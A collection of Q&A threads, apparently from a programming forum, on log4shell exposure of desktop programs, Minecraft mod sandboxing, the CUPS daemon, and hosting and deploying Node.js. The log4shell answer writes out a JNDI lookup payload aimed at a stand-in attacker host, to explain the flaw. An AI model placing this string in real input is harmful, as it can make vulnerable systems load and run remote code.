Is a "program" which is not a server application affected by the log4shell vulnerability? - log4j

What I don't understand about the log4shell problem: let's say we have a simple program which uses the log4j module.
Is this program, which doesn't serve anything (like a webserver or any other application that serves something to the internet/network), vulnerable in any way?
Regards
Ubbu

ANY application that uses log4j2 can be vulnerable, including desktop applications which don't serve anything to the internet, as long as the system executing it has a connection to the internet.
Reason:
The application is vulnerable when it logs a certain string: one containing a JNDI lookup such as ${jndi:ldap://attacker.example.com/a}. This could be, e.g., the content of a file you open with a Java desktop application. If you are tricked into opening a prepared file with a known-vulnerable desktop application, just opening the file will log the string. This makes log4j load arbitrary code from the internet (almost any device is constantly connected to the internet) and execute that code on your machine.
So yes, any Java application might be affected; it is not limited to server applications serving web content.
IF your program has only static log messages, it is not exploitable. But almost any program logs some kind of "user" input. It's just that you don't always know that you are providing input to a program right now.

Obviously not, if the machine has no internet connection. ;)
But if it gets a connection to the internet later on, then it would be :)

Related

Security of minecraft server mods containing Java code

I am running a Java minecraft server on my Linux server. I have been asked to install some mods (e.g. data packs) on the server which appear to contain Java code written by a third party other than Mojang.
Is this Java code restricted in what it can do, or can it run any arbitrary code it likes (e.g. read /etc/passwd, open TCP ports, claim huge amounts of memory, etc.)?
In other words, how risky are minecraft mods containing Java code?
This is a very good question. I actually was wondering that too. I have spent a bit of time looking at the binaries of minecraft and the minecraft server spigot. I assume we both use the Java Edition.
First of all, Java code, once you run it on a host, can do anything. The only mechanism in Java that can prevent that and protect the user from the developer is the security manager. Once you turn on the security manager (which is an opt-in mechanism), you have the ability to define a set of rules that Java will obey, e.g. that it will not write into directories you don't allow it to.
So the question is: does minecraft use the security manager by default? I am 99% sure it does not. No one uses the security manager because it is a pain to configure it right, and things stop working every time you get it wrong (you know an application uses the security manager when you run into policy misconfiguration problems every now and then).
Minecraft itself is launched from an exe; I would not know where to turn the security manager on even if I wanted to. There is a bit of hope with the spigot server: you can enable the security manager with -Djava.security.manager and supply your policy with -Djava.security.policy==my.policy. But getting the policy right will be a pain. I will try to look into it, though, when I have a free week or so.
Minecraft mods can act with the full permissions of the user running Minecraft. If you don't trust the author of a mod, then there are basically two approaches to using it safely:
Audit the source code yourself, and then compile the mod yourself so you know it matches the binary
Run Minecraft in a sandbox such as a VM, or as a heavily restricted user.

How CUPS web interface works

I'm wondering how the Common Unix Printing System "CUPS" handles user actions and modifies the configuration files. From my humble background, a webpage can only access/edit files when there is some web server and a server-side script, so how does it work without installing a web server?
Does it work through some shell script? If yes, how does that occur?
It is not the web frontend that alters the configuration files. At least not if you compare it to the 'typical' setup: HTTP server, scripting engine, script.
CUPS itself contains a daemon, which also acts as a minimal web server. That daemon has control over the configuration files, and it is free to accept commands from a web client it serves. So no magic here.
Turning that around, you could also set up a system running a 'normal' HTTP server with such rights that it is able to alter all system configuration files. It's all a question of how that server/daemon is set up and started; it breaks down to simple rights management. You certainly do not want to do that, though ;-)
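If it helps to see the shape of that design, here is a minimal sketch in Node.js of the same pattern: one daemon that both owns a config file and answers HTTP requests. It only illustrates the architecture; none of it is CUPS code, and the path and port are invented.

    // Illustrative only: a daemon that owns its config file and serves a tiny web UI.
    const http = require('http');
    const fs = require('fs');

    const CONF = '/tmp/demo.conf'; // stand-in for a config file the daemon controls

    http.createServer((req, res) => {
      if (req.method === 'POST') {
        // The "web frontend" is just HTTP handled by the daemon itself,
        // which writes the file with its own process privileges.
        let body = '';
        req.on('data', chunk => { body += chunk; });
        req.on('end', () => {
          fs.writeFileSync(CONF, body);
          res.end('saved\n');
        });
      } else {
        res.end(fs.existsSync(CONF) ? fs.readFileSync(CONF) : 'no config yet\n');
      }
    }).listen(8631); // CUPS itself listens on 631; this demo uses an unprivileged port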

Node server GUI frontend

Well, we all know about headless servers. Actually, probably the vast majority of servers out there are headless.
As usual (it seems), my situation asked for quite something else. Basically, the proposed architecture looks more or less like:
The app server (node.js) is situated on a physical machine physically connected to two screens.
Between this machine and the 'net there are all sorts of regular networking layers. Please keep in mind that one of the main reasons for this setup is physical portability: ie, the client gets the necessary hardware as the product. The server itself relies on CDN for static files etc.
Each monitor/screen needs to show something different, produced by the same node server.
For now this server will probably run on Windows, but given a concept (which is what my question is after), I can change the code to run on the target platform. Well, depending on my code, this could even be done automatically.
So, my actual question. Node is quite flexible in that it can be run by anything - even custom made software (C++, Delphi, even GM). Just shell_exec('node server.js') and we're off.
But the screens themselves need to be quite dynamic. So node needs to influence both screens in some way. A few options I'm considering:
A custom app which creates two resizable, featureless windows with an embedded Chromium browser, to be controlled by the node server somehow (how would node interact with these browsers?)
A custom app which, according to node CLI output, updates the two screens' UI. Since I need something flashy as the UI, this app would be created in something like GameMaker, or a similar engine.
PS: Just in case you're asking: the physical connection, as opposed to a network one (e.g. a web-based GUI frontend), is by design.
I'd just wire up the result/monitoring screens as regular HTML pages. In your Node app, create a second HTTP server (on a non-standard port, firewalled from the public) that serves up the monitoring page.
Use socket.io to send the realtime data to the monitoring page, which can make everything look pretty. Fire it up in a full-screen instance of Chrome.
This approach completely frees you from any kind of platform dependency, and decouples the monitoring app from the server app. It leaves you the latitude to run the monitoring app on a separate box if necessary.
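A minimal sketch of that idea, assuming socket.io is installed (npm install socket.io); the port, the 'stats' event name, and monitor.html are all invented for illustration:

    // Second HTTP server, on a non-standard port, serving only the monitoring page.
    const http = require('http');
    const fs = require('fs');
    const { Server } = require('socket.io');

    const monitor = http.createServer((req, res) => {
      res.setHeader('Content-Type', 'text/html');
      res.end(fs.readFileSync('monitor.html')); // the page that renders the data
    });
    const io = new Server(monitor);

    // Push whatever realtime data the app produces; a 1s heartbeat stands in here.
    setInterval(() => {
      io.emit('stats', { uptime: process.uptime(), time: Date.now() });
    }, 1000);

    monitor.listen(8081); // keep this port firewalled from the public

On each screen, a full-screen Chrome instance (e.g. started with --kiosk) loads the page, which pulls in /socket.io/socket.io.js and subscribes with io().on('stats', render). Two different pages, one per monitor, give you two different displays from the same Node server.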

Nodejs on Nearlyfreespeech?

I'm looking at an existing website, deployed on an NFS server. I'd like to rewrite some portions of it to run on nodejs. As far as I can tell, nodejs isn't supported by the NFS folk, but I am constrained to using their servers.
So, is there a way to shoe-horn nodejs onto a nearlyfreespeech server? Has anyone tried this successfully?
As of 24/September/2014, NFS now supports persistent processes:
Intro and overview - More power, more control, more insight, less cost
Official example - How-To: Django on NearlyFreeSpeech.NET
3rd party example - Run node.js on NearlyFreeSpeech.Net
To summarise the process described in mopsled.com's third-party example:
1) In NFS.N's admin UI, select your site's domain shortname under Sites, then change that site's "Server Type" to "Custom" instead of PHP / Apache.
2) Put your Node server code somewhere in /home/protected/
3) Create a shell script (e.g. run.sh) somewhere in /home/protected/ that contains the command(s) to start your server (e.g. npm run start or node server.js). NFS.N will automatically run this script as a continuous process using a "Daemon", which we'll configure in the next step. (A minimal example of the server such a script might launch appears after these steps.)
4) Select "Daemons" in your site's NFS.N admin UI, and enter your server's startup shell script path in the "command line" field. Complete the other fields as you see fit.
5) NFS.N will now ensure that your custom server process will run indefinitely. Your web server will now be available at the port your server listens at. However, NFS.N doesn't give root access for your server to communicate through the normal "low-level" internet ports (eg :80 and :443), so if you want to serve those, you must use NFS.N's "Proxy" feature described in the next step.
6) If you need to listen on low-level ports: select "Add a Proxy" in your site's NFS.N admin UI and enter the relevant settings, checking the "Bypass Apache entirely" option and giving the port your server is listening on for the "Target Port" option.
That's it! You can now stop/restart the server's continuous process (the shell script that the Daemon is maintaining) in the Daemon's configuration page.
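For concreteness, here is a sketch of the kind of server the Daemon-managed script (e.g. a run.sh containing node /home/protected/server.js) might start. The filename and port are invented; per step 5, the port must be an unprivileged one unless you add a Proxy as in step 6:

    // /home/protected/server.js - minimal long-running process for the Daemon to keep alive
    const http = require('http');

    http.createServer((req, res) => {
      res.end('hello from NearlyFreeSpeech\n');
    }).listen(8080, () => console.log('listening on 8080'));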
NFS.net has a new "NFGI" architecture that may open up this possibility:
NFGI can be made to work with other languages as well, making them first-class citizens of our service, just as fast and integrated as PHP currently is. This paves the way for making all sorts of frameworks viable that have traditionally been too slow when run through CGI. Rails. Catalyst. Django. We also believe it can be leveraged to make node.js work on our service, but we’re not 100% sure about that.
(Source: http://blog.nearlyfreespeech.net/2013/09/21/cgissh-upgrades/)
If you want this feature you can vote for it in their feature request system at https://members.nearlyfreespeech.net/support/voting
Although to be honest, I concur with the earlier answers: using Node via CGI would lose some of the benefit... but it would not be without its charms. Something like http://larsjung.de/node-cgi/ for NFS.net would be an interesting JavaScript replacement for PHP.
The problem is not that NFS.net will not support NodeJS. The thing is that you can't have "long-running processes", i.e. servers. Since you can't run servers, you can't run Node.
In fact, the only way you can have anything dynamic there is by using CGI. There's no reason why a JavaScript engine could not be used to generate pages in response to requests, but I am not sure that can be done with node.

Deploying updates to production node.js code

This may be a basic question, but how do I go about efficiently deploying updates to currently running node.js code?
I'm coming from a PHP and client-side JavaScript background, where I can just overwrite files when they need updating and the changes are instantly available on the production site.
But in node.js I have to overwrite the existing files, then shut down and re-launch the application. Should I be worried about potential downtime here? To me it seems like a riskier approach than the PHP (scripting) way, unless I have a server cluster where I can take down one server at a time for updates.
What kind of strategies are available for this?
In my case it's pretty much:
svn up; monit restart node
This Node server is acting as a comet server with long polling clients, so clients just reconnect like they normally would. The first thing the Node server does is grab the current state info from the database, so everything is running smoothly in no time.
I don't think this is really any riskier than doing an svn up to update a bunch of PHP files. If anything, it's a little safer. When you're updating a big PHP project, there's a chance (on a high-traffic site, basically a 100% chance) that requests will hit the web server while you're still updating, which means a single request could run a mix of updated and out-of-date code. At least with the Node approach, you can update everything, restart the Node server, and know that all your code is up to date.
I wouldn't worry too much about downtime, you should be able to keep this so short that chances are no one will notice (kill the process and re-launch it in a bash script or something if you want to keep it to a fraction of a second).
Of more concern however is that many Node applications keep a lot of state information in memory which you're going to lose when you restart it. For example if you were running a chat application it might not remember who users were talking to or what channels/rooms they were in. Dealing with this is more of a design issue though, and very application specific.
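One common mitigation, sketched below under the assumption that the state is small and JSON-serialisable (the file name and state shape are invented): flush in-memory state to disk on shutdown and reload it at startup. A database or Redis serves the same purpose for anything bigger.

    const fs = require('fs');
    const FILE = 'state.json'; // illustrative; use a database for anything non-trivial

    // Reload whatever the previous process saved, if anything.
    let state = fs.existsSync(FILE)
      ? JSON.parse(fs.readFileSync(FILE, 'utf8'))
      : { rooms: {} };

    // Persist on graceful shutdown, so the restarted process picks up where we left off.
    process.on('SIGTERM', () => {
      fs.writeFileSync(FILE, JSON.stringify(state));
      process.exit(0);
    });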
If your node.js application can't skip a beat, meaning it is under continuous bombardment by incoming requests, you simply can't afford the downtime of a quick restart (even with nodemon). In some cases you want a truly seamless restart of your node.js apps.
To do this I use naught: https://github.com/superjoe30/naught
Zero downtime deployment for your Node.js server using builtin cluster API
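This is not naught's code, just a sketch of the cluster idea it builds on: the master process stays alive while a worker running the old code is swapped for a worker running the new code (the port and the choice of SIGHUP are arbitrary here):

    const cluster = require('cluster');
    const http = require('http');

    if (cluster.isMaster) {
      let worker = cluster.fork();
      // On SIGHUP, fork a worker with the freshly deployed code,
      // then retire the old one once the new one is accepting connections.
      process.on('SIGHUP', () => {
        const old = worker;
        worker = cluster.fork();
        worker.once('listening', () => old.disconnect()); // lets in-flight requests finish
      });
    } else {
      http.createServer((req, res) => res.end('ok\n')).listen(8000);
    }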
Some cloud hosting providers for Node.js (like Nodejitsu or Windows Azure) keep both versions of your site on disk in separate directories and just redirect traffic from the old version to the new one once it has been fully deployed.
This is usually a built-in feature of Platform as a Service (PaaS) providers. However, if you are managing your own servers, you'll need to build something to switch traffic from one version to the next once the new one has been fully deployed.
An advantage of this approach is that rollbacks are easy, since the previous version remains intact on the server.
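On self-managed servers, the switch can be as small as a front proxy that can be told which deployed version to forward to. A rough sketch (the ports and the /_switch endpoint are invented, and real use would need error handling and access control):

    const http = require('http');
    let target = 8001; // port of the currently live version; 8002 runs the other one

    http.createServer((req, res) => {
      if (req.url === '/_switch') {           // flip live traffic to the other version
        target = target === 8001 ? 8002 : 8001;
        return res.end('now serving :' + target + '\n');
      }
      // Forward everything else to whichever version is live.
      const upstream = http.request(
        { port: target, path: req.url, method: req.method, headers: req.headers },
        (resp) => { res.writeHead(resp.statusCode, resp.headers); resp.pipe(res); }
      );
      req.pipe(upstream);
    }).listen(8000);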
